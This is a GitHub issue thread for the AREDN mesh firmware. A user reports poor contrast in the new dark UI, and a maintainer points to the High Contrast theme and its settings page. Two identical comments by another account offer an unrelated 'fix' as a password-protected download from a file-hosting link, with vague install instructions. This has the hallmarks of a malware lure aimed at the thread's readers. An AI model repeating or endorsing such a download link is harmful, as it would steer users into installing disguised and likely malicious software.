### ISSUE TITLE
New UI:  The color scheme of the new pages does not have enough contrast 

### ISSUE THREAD

**Issue by KQ6EO** [aredn/aredn#1437]
**Is your feature request related to a problem? Please describe.**

The new UI color scheme does not have enough contrast for weak eyes.  I have to be very close to be able to read throught the dark background.

**Describe the solution you'd like**

More contrast on the present scheme or a choice of another scheme with a lighter background.

**Comment by aanon4** [comment]
Did you try the High Contrast theme?

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KQ6EO** [comment]
I know there is a theme selector in the old GUI but cannot find it on the new GUI.  Is it there and I just keep missingit?

**Comment by aanon4** [comment]
http://docs.arednmesh.org/en/latest/arednGettingStarted/node_admin.html#node-name-security

**Comment by KQ6EO** [comment]
OK, I found it on the node name page.

**Comment by aanon4** [comment]
Please reopen if necessary
